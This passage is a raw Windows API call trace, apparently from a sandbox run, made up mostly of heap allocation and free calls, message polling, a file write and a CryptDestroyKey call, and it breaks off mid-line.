[0223.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0223.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0223.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0223.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0223.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0223.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0223.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0223.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0223.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0223.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0223.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0223.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0223.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0223.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0223.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0223.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0223.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0223.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0223.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0223.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0223.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0223.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0223.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0223.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0223.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0223.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0223.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0223.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0223.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0223.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0223.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0223.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0223.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0223.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0223.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0223.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0223.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0223.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0223.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0223.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0223.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0223.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0223.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0223.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0223.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0223.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0223.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0223.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0223.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0223.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0223.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0223.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0223.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0223.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0223.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0223.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0223.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0223.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0223.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0223.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0223.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0223.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0223.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0223.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0223.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0223.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0223.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0223.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0223.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0223.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0223.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978518 | out: hHeap=0x970000) returned 1 [0223.891] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552f8 [0223.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55248 [0223.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55258 [0223.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0223.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551e8 [0223.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0223.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0223.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0223.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0223.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0223.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0223.891] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0223.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55278 [0223.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0223.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0223.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0223.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0223.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0223.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0223.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0223.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0223.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0223.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0223.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0223.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0223.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0223.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0223.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0223.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0223.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0223.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3f28) returned 0x2f205a8 [0223.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0223.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0223.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0223.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0223.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0223.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0223.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0223.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0223.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0223.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0223.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0223.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0223.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3f28) returned 0x2f244d8 [0223.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f205a8 | out: hHeap=0x970000) returned 1 [0223.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0223.893] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0223.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0223.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0223.893] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0223.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0223.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0223.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0223.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0223.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0223.894] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0223.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0223.894] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0223.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0223.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0223.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51190 [0223.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0223.894] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04268 [0223.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0223.894] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0223.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0223.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0223.895] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.895] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0223.895] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.895] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0223.895] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.895] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.895] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.895] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.898] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.898] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.898] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.899] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f14818*, nNumberOfBytesToWrite=0x3f28, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14818*, lpNumberOfBytesWritten=0x8cf5e4*=0x3f28, lpOverlapped=0x0) returned 1 [0223.900] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.901] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.901] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0223.901] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.901] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0223.901] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0223.901] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0223.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e510b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0223.901] CryptDestroyKey (hKey=0xa87490) returned 1 [0223.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0223.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0223.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0223.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0223.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0223.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0223.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0223.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0223.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0223.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0223.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0223.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0223.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0223.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0223.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0223.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0223.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0223.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0223.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0223.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0223.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0223.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0223.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0223.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0223.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0223.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0223.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0223.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0223.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0223.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0223.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0223.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0223.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0223.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0223.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0223.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0223.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0223.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0223.903] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0223.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0223.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0223.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0223.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0223.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0223.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0223.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0223.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0223.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0223.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0223.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0223.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0223.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0223.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0223.904] HeapFree (in: 